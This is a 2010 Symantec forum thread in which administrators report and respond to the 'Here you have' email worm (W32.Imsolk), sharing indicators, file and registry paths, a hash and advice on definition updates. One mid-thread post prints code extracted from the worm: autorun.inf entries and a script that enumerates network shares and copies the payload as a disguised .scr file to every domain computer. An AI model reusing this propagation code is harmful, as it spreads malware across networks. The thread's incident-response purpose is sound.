0 Day threat/multiple spam messages "Here you have"
Updated: 09 Sep 2010 | 46 comments
Anyone else experiencing this? Body of the messages hitting our GAL are as follows:
Hello:
This is The Document I told you about,you can find it Here.http://www.sharedocuments ******malicious link*************
Please check it and reply as soon as possible.
Cheers,
Discussion Filed Under:
Comments
We are seeing it here in
We are seeing it here in California.
Link is to a file with a .scr
Link is to a file with a .scr extension, but appears to be an executable. Messages are originating from our internal Exchange users and being sent to multiple distribution lists.
Many reports of this coming
Many reports of this coming in - http://www.google.com/search?q=here+you+have+virus...
we have got same any solution
we have got same any solution from symantec yet
I opened a case with Symantec
I opened a case with Symantec support, they said a rapid release definition is forthcoming but no ETA at this time.
Same here at my firm
Huge virus outbreak at my firm.
If anyone does get word on a rapid release, please share.
If anyone does get word on a rapid release, please share.
This is better served with an
This is better served with an anti-spam product and not Endpoint Protection which has no Anti-spam capabilities natively.
It was submitted to Symantec's brightmail submission line for North America and I'm sure an anti-spam rule will be created asap.
There is an online portal, save yourself the long hold times. Create ticket online, then call in with ticket # in hand :-) http://mysupport.symantec.com "We backup data to restore, we don't backup data just to back it up."
The messages are internal,
The messages are internal, so obviously malware is involved here.
Seen it, have some details
Here's what we've pulled out so far. Your mileage may vary.
The malicious file linked in the e-mail is shown as a pdf but it's actually a .scr. I don't have the site here but we blocked it first thing.
Files:
Look for n73.image12.03.2009.JPG.scr and kill it. Registry entries show “pdf*.scr” so anything matching that pattern are suspect
In c:\windows:
Csrss.exe <-that’s a big part of this
ff.exe
gc.exe
hst.iq
ie.exe
im.exe
op.exe
pspv.exe
rd.exe
re.exe
re.iq
tryme1.exe
Registry:
Hklm\software\microsoft\windows nt\currentversion\image file execution options\<any key ending in ExE> ß pay attention to the case
Hklm\software\microsoft\search assistant\ACMru\5603 and possibly 5604
Here's some code we pulled out of the .scr
[autorun]
open=open.exe
icon=%windir%\system32\shell32.dll,8
action=Open Drive to view files
shell\open=Open
shell\open\command=open.exe
shell\open\default=1
' List Network Shares
Const HKEY_LOCAL_MACHINE = &H80000002
dim i
i="0"
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colShares = objWMIService.ExecQuery("Select * from Win32_Share")
For each objShare in colShares
strComputer = "."
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
strValueName = i
strValue = objShare.Path
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
i = i + 1
Next
on error resume next
Dim domain
Dim computer
Set domain = GetObject("WinNT://Workgroup")
domain.Filter = Array("Computer")
For Each computer In domain
strComp = computer.Name
DoEvents
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\d\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\c\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\New Folder\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\music\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\print\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\E\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\F\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\G\" & "N73.Image12.03.2009.JPG.scr"
FileCopy App.Path & "\svchost.exe", "\\" & strComp & "\H\" & "N73.Image12.03.2009.JPG.scr"
Next
Text4
[autorun]
open=open.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open=Open
shell\open\command=open.exe
shell\open\default=1
/back to work, don't ask me for help I'm a little busy lol
MD5 hash of torjan
2bde56d8fb2df4438192fb46cd0cc9c9
you're welcome
Link in the email is to http://members.multimedia.co.uk/............
Getting hit by "Here you have" here too
First hit our corporate office and then spread through our subs. First reports were at about 11:21am PDT. Two hours later, Symantec has not raised their threat level and I cannot find any patches yet.
open.exe
We are finding open.exe and autorun.inf in their h drives
We submitted a copy to Symantec....
We submitted toi Symantec and here is the response:
We have processed your submission (Tracking #------------) and your submission
is now closed. The following is a report of our findings for the files in
your submission:
File: C:\Documents and
Settings\<some user id here>\Desktop\PDF_Document21_025542010_pdf.scr.trojan
Machine: Machine
Determination: This file is detected as 'Trojan Horse, ' with our existing
Rapid Release definition set.
URL: http://www.symantec.com/avcenter/venc/data/trojan.horse.html
The link goes to "rapid release" defs from 2004. So by Symantec's logic, this is something already handled by SEP?
/golf clap.
SEP will not stop a spam
SEP will not stop a spam email if there's no malicious code in it as it's not an anti-spam product. The malicious code comes from clicking on the link IN the email. As Teiva-boy said, if you want to stop the email itself from spreading to your user, use your anti-spam solution to do so, and educate your users to not click on the link inside the email.
SEP *should* stop malicious code from running
Ted - I understand your point about spam and we are working to address that on our mail servers and spam blocking tools. However, my concern is that once the link is clicked, SEP should block the malicious code from running and replicating the virus on the computer. Our SEP is up to date and yet users (who shouldn't click on the link, but still do) are getting infected. Does Symantec not intend to address this issue?
This is a new variant. Have
This is a new variant of W32.Imsolk.A@mm. Have you downloaded the latest rapid release definitions? If not then you do not have the most current definitions for this threat. "Trojan Horse" is a generic detection, most likely why the link for the RR definitions the previous poster were from 2004.
Edit: Actually it seems that new definitions are not out yet according to an earlier poster in this thread. But as he said, Security Response is working on it.
SEP *should* stop malicious code from running
I completely agree with this. SEP Proactive Threat Protection should be able to catch this process SSMYPICS SCR running in memory. Plus, you can't even add this to the exception list (only allows .EXE) to stop/quarantine it.
It's broke.
Just got off the phone with
Just got off the phone with support..they said any rapid release definition sequence 114819 or higher should do the trick
Thanks for the
Thanks for the information.
There you have it folks, go get the RR definitions ASAP.
JDB File
If I update my SEPM using the JDB file procedures will my client get the new rapid release defs thru LU?
Yup, run command on your
Yup, run command on your groups and tell them to update content.
Is this only if you use your
Is this only if you use your SEPM in conjunction with LOCAL LiveUpdate server, or will SEPM actually feed rapid definitions to clients regardless? Also, does anyone know if after running rapid release defs, main page on SEP client should change?
Also just got an email from
Also just got an email from our SE....They will be releasing certified defs at 7PM EST. Hope that helps.
Any update to the releasing
Any update to the releasing of the updates?
FYI - we called a bit ago and the one that will come through Live Updates hasn't been released.
Clarification
Trojan Horse is indeed a generic detection, and while the initial date on the threat on the Security Response page may be dated 2004, additional detections are being added all the time.
sandra
Symantec Endpoint & Mobility Group / Information Development
Don't forget to mark your thread as 'solved' with the answer that best helped you!
To note, it spreads via
To note, it spreads via network drive too, or should I say, it's copying autorun.inf and open.exe (inf points to exe, naturally) to ALL drives in My Computer, and if there are mapped drives, it will drop these two files in the root there as well. So scan your servers, too!
From Security Response's
From Security Response's page:
"Enterprise customers are protected by a Rapid Release signature set dated Sep 9th 2010 rev 023, or later. The next regular definition set to be published at 16:00 PST Sep 9th 2010 will contain the detection."
Current definitions, as of this writing:
Multiple Daily Updates
Virus Definitions created 9/9/2010
Virus Definitions released 9/9/2010
Defs Version: 120909x
Sequence Number: 114820
Extended Version: 9/9/2010 rev. 24
Total Detections (Threats & Risks): 8483569
Daily Updates
Virus Definitions created 9/9/2010
Virus Definitions released 9/9/2010
Defs Version: 120909x
Sequence Number: 114820
Extended Version: 9/9/2010 rev. 24
Total Detections (Threats & Risks): 8483569
Detection for this threat should therefore be included currently.
sandra
Symantec Endpoint & Mobility Group / Information Development
Don't forget to mark your thread as 'solved' with the answer that best helped you!
Has the ETA for the certified
Has the ETA for the certified definitions been pushed back?
will a removal tool be posted?
Will a removal tool be posted? McAfee appears to have one...
Is there a location where
Is there a location where Symantec is posting new information about this? A blog perhaps?
These are the best analysis links I've come across thus far:
http://www.threatexpert.com/report.aspx?md5=2bde56d8fb2df4438192fb46cd0cc9c9
http://www.threatexpert.com/report.aspx?md5=bd9208edf44d0ee32b974a2d9da7bc61
Does anyone know if SEP does
Does anyone know if SEP does a quick on-access scan once new definitions are loaded? I got r24 but csrss.exe is still alive and happy in memory and can be seen in Task Manager.
Email I received from
Email I received from Symantec at 9pm EST indicates this is fixed in definitions "rev. 037".
I'm only seeing rev 024 on the web site and its now 11:45pm EST. Hello Symantec anybody home?
I believe r37 are rapid dats.
I believe r37 are rapid dats. However in my post above, even rapid dats are unable to desinfect file from memory..
You should be able to set a
You should be able to set a scan "when new defs arrive" in SEPM
Endpoint Knowledge Base
Security Best Practices
The latest rapid release is
The latest rapid release is dated 2010.09.09 rev.50.
Prachand Kumar MCSE-2003 Symantec Technical Specialist (SCTS)
Do you have a direct link for
Do you have a direct link for these?
Who marks a post as
Who marks a post as "solution"? Shouldn't the affected customers decide when the issue has been resolved?
Have tried with this
http://www.symantec.com/business/security_response/writeup.jsp?docid=2010-090922-4703-99&tabid=3
http://support.microsoft.com/kb/q263455/
If this Info helps to resolve the issue please Mark as Solution
Thanks
First update using rapid
First update using rapid release updates and then try to scan.A signature has been added in the latest rapid release ref:Security Response.You can download it from this link
Rapid Release Virus Definitions
Please don't forget to mark your thread solved with whatever answer helped you : ) Thanks & Regards Aravind
If you want to know how to
If you want to know how to update using rapid release refer these KBs.
How to update definitions for Symantec Endpoint Protection Manager using a JDB file
Using Rapid Release virus definitions to update Symantec AntiVirus 10.x or Symantec Client Security 3.x clients and server
How to update definitions for Symantec Endpoint Protection using the Intelligent Updater
Please don't forget to mark your thread solved with whatever answer helped you : ) Thanks & Regards Aravind
Good Blog Post
Hello Forum Community,
This blog posting is quite good.
New Round of Email Worm, "Here you have" https://www-secure.symantec.com/connect/blogs/new-round-email-worm-here-you-have
Thanks and best regards,
Mick
With thanks and best regards,
Mick
Here is a writeup for the
Here is a writeup for the same
W32.Imsolk.B@mm
Web URL: http://www.symantec.com/security_response/writeup....
Certified LiveUpdate definitions have now been posted for the same.
Thanks & Regards,
Mudit Kumar
One question
At first many thanks for the given Information!
I used the rapid release update and the client(s) show Signature version 0909 v54 but in the dashboard the client is still shown as vulnerable to this threat!
why is that???
Regards
Stephan Gruhn
I'm guessing you mean the
I'm guessing you mean the dashboard on the SEPM, which is reporting historical information (last 12 hours). Go with the actual signature date/revision.
sandra
Symantec Endpoint & Mobility Group / Information Development
Don't forget to mark your thread as 'solved' with the answer that best helped you!
So how can i compare the
So how can i compare the actual status of vulnaribilty to the implemented signature on the client??Is there a ressource where i can lookup wich definitions protect me to a specific threat??
thanks for help
Stephan
Would you like to reply?
Login or Register to post your comment.